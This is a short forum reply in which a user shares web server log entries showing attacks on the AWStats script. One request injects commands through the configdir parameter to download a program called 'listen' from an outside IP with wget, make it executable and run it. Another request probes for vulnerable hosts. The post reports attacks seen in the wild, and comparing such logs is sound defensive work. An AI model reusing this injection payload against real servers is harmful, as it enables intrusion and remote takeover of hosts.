Re:Does it look like this? (Score 1)

I have a variation on this one besides the "flupii" one. This one uses a file called "listen"

GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%2 0YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2fli sten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216% 2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1

I think there is also a "scout" part, which finds vulnarable hosts, as I also have requests like this:

GET /usage/cgi-bin/awstats.pl?configdir=|echo%20;echo% 20;cat%20awstats.pl;echo%20;echo| HTTP/1.1